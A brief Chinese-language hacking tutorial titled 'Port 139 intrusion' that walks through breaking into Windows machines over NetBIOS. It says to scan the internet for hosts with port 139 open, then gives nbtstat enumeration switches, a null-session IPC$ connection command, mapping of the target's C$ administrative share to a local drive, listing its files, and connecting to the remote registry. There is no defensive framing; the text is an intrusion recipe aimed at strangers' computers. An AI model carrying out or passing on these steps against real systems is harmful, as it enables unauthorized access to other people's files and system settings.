139端口入侵

首先当然是扫一下网上开了139端口的机子了
其实139端口也就是NetBIOS session端口 进行文件和打印共享的端口，你要先用NBTSTAT看一下NETBIOS的信息
命令方式nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]开关： -a 列出给定主机名的远程计算机的名字表（name table）
-A 列出给定IP地址的远程计算机的名字表 -c 列出远程名字缓冲区（name cache），包括IP地址
-n 列出本地NetBIOS 名字
-r 列出通过广播（broadcast）和WINS解析的名字
-R 清除和重新装入远程的缓冲的名字表
-S 列出和目标IP地址会话的表
-s 列出会话表转换

OK，我们在来看看共享
C:\>net view \\[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:\>net use \\IP\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\IP Shared resources at \\IP
Share name Type Used as Comment

IPC成功建立后，服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的。
c:\>net use x: \\[ipaddr]\[share]
万一不行的话我们就用上面的方法IPC$

一旦IPC$共享顺利完成，我们就可以映射了：
c:\>net use g: \\IP\c$

得到了C$共享，并将该目录映射到g:，键入：
c:\>dir g: /p

就能显示这个目录的所有内容。

成功地进行了IPC$连接后，点击Start -> Run，键入regedit。选择Registry -> Connect Network Registry，再键入那台机器的IP地址。不一会，就能看目标计算机的的Registry了。